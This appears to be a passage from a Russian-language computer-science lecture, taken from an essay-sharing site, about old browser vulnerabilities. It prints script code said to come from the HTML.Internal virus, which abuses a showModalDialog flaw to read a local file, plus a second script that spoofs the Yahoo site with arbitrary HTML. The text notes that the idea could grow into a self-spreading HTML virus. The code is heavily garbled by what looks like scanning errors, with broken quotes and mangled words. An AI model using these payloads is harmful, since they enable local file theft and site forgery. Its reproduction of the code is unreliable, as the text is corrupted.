Лекция: Дает ему возможность работать с локальными файлами. Дальнейшее развитие этой идеи вполне может привести

К созданию полноценного html-вируса, размножающегося при загрузке из Сети, а не только из локального

файла, как это было с вирусом HTML.Internal:

<SCRIPT>

s=«about:<SCRIPT>a=window. open С view-source: x' );a. document, open (); „+

“a. document, write(\»<object id='myTDC' width=100height=100"+

«classid=»CLSID:333C7BC4-460F-11DO-BC04-0080C7055A83'>"+

"<param name='DataURL' value=' с:/test. txf>"+

"<param name='UseHeader' value=False>"+

"<param name='CharSet' VALUE^iso-SSSO-I^"

"<param name='FieldDelim' value='}'>"+

"<parani name='RowDelim' value='}'>"+

"<param name='TextQualifier' value='}'>"

"</object><torm><textarea datasrc='SmyTDC' datafld='Column1' rows=10 cols=80>"+

"</textarea></form>\"); a. document, write"+

"('<SCRIPT>setTimeout(\«alert(document.forms[0].elements[0].va.lue)\»,4000)</SCRIPT' ):"+

«a. document, write('>' ); a. document, close(); close ();</»+

«SCRIPT>%01file://c:/»;

b=showModalDialog(s);

</SCRIPT>

Использование этой же ошибки в целях подделки сайтов демонстрирует следующий код:

<SCRIPT>

b=showModalDialog(

«about :<SCRIPT>a=window.open(' www. yahoo, corn' ); „

+“a. document. writeC <HTML><HEAD><TITLE>Yahoo</TITLE><BODY></HEAD>Любoйhtml-кoд' ); close()</»

+«SCRIPT>%01http://www. yahoo, corn»);

</SCRIPT>

еще рефераты
Еще работы по информатике
© РОНЛ.орг 2000-2026 По всем вопросам обращаться на эту почту: admin@ronl.org